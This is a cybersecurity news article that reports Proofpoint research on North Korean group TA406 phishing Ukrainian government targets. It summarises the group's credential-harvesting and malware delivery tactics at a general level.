TA406 Hackers Target Government Entities to Steal Login Credentials

The North Korean state-sponsored threat actor TA406, also tracked as Opal Sleet and Konni, has set its sights on Ukrainian government entities.

Proofpoint researchers have uncovered a dual-pronged offensive involving both credential harvesting and malware deployment through highly targeted phishing campaigns.

The likely objective of these attacks is to gather strategic intelligence on the Russian invasion of Ukraine, reflecting TA406’s historical focus on political and geopolitical insights.

This surge in activity coincides with North Korea’s commitment of troops to assist Russia in late 2024, suggesting an intent to assess the risks to their forces and gauge Russia’s potential demands for additional military support.

DPRK-Linked Group Intensifies

The phishing emails, often sent from spoofed freemail accounts mimicking think tank representatives, leverage current Ukrainian political events as lures.

A notable campaign impersonated a fictitious senior fellow from the nonexistent Royal Institute of Strategic Studies, directing targets to download a password-protected RAR archive from the file-hosting service MEGA.

Once decrypted, the archive deploys a CHM file embedding HTML content that, upon interaction, triggers PowerShell scripts for reconnaissance, collecting data like IP configurations and antivirus details.

This information is Base64-encoded and exfiltrated to a command-and-control (C2) server.

Follow-up emails are sent if targets fail to engage, increasing the pressure to interact with the malicious content.

In parallel, TA406 has distributed HTML attachments and ZIP files containing LNK shortcuts, which execute encoded PowerShell to establish persistence through scheduled tasks and autorun scripts, ensuring long-term access to compromised systems.

Credential Harvesting

Before the malware campaigns, TA406 attempted credential theft by sending fake Microsoft security alerts from Proton Mail accounts to the same Ukrainian targets.

According to the Report, These messages, citing suspicious sign-in activity, directed victims to a compromised domain, jetmf[.]com, previously linked to Naver credential harvesting.

While a specific harvesting page could not be recovered during analysis, the overlap in tactics and targeting strongly suggests TA406’s involvement.

This credential harvesting likely serves as a precursor to deeper intrusions, enabling the group to access sensitive communications and further their espionage efforts.

Unlike Russian threat actors focusing on tactical battlefield data, TA406’s operations appear geared toward understanding Ukraine’s political will to resist the invasion and the broader outlook of the conflict, providing North Korean leadership with critical insights into their strategic positioning.

Indicators of Compromise (IoC)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!